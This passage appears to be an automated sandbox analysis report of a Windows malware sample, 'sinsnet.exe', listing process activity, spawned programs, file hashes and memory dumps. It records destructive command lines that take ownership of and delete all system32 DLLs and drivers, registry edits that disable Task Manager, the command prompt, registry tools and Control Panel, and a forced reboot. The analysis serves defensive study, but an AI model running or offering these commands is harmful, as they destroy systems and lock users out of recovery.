PID 2688 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2688 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2688 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2688 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2688 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2688 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2688 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe

Processes

C:\Users\Admin\AppData\Local\Temp\sinsnet.exe

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\*.dll && icacls c:\windows\system32\*.dll /grant Everyone:(F) && del /s /q c:\windows\system32\*.dll && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\drivers\* && icacls c:\windows\system32\drivers\* /grant Everyone:(F) && del /s /q c:\windows\system32\drivers\* && exit

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\*.dll

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant Everyone:(F)

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\*.dll /grant Everyone:(F)

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\shutdown.exe

"C:\Windows\System32\shutdown.exe" -r -t 0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x598

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

N/A

Files

memory/2688-0-0x000000013F560000-0x000000013F701000-memory.dmp

memory/2396-2-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\note.txt

MD5 78551eabd7131c45b744a0cf420d29f7
SHA1 0f6792d1f3339ab5ac7674ad46267049ec9eb2b7
SHA256 9904338a1a2758f5969ba2affe5c46beaac955b6c4b87c67d20063ef5e0602f8
SHA512 abee3d1cd3860afe799deaac6e2c45fb741504ff80eb9fc7f39705cd7a9d46f61cee13cea6e676a33ea566f9256e13fa62dac7156b376ff94a7ced742516c064

memory/2796-4-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1312-5-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1036-6-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1488-8-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2688-7-0x000000013F560000-0x000000013F701000-memory.dmp

memory/2876-9-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/608-10-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2516-11-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1564-12-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/3060-13-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1584-14-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1108-15-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2500-16-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2416-17-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2296-18-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/568-19-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1796-20-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2448-21-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/996-22-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2212-23-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1428-24-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1668-25-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2944-26-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2832-27-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2688-28-0x000000013F560000-0x000000013F701000-memory.dmp

memory/2832-29-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2944-30-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1668-31-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1428-32-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2212-33-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/996-34-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2448-35-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1796-36-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/568-37-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2296-38-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2416-39-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2500-40-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1108-41-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1584-42-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/3060-43-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1564-44-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2516-45-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/608-46-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2876-47-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1488-48-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1036-49-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/1312-50-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2796-51-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp

memory/2396-52-0x000007FEF7660000-0x000007FEF76AC000-memory.dmp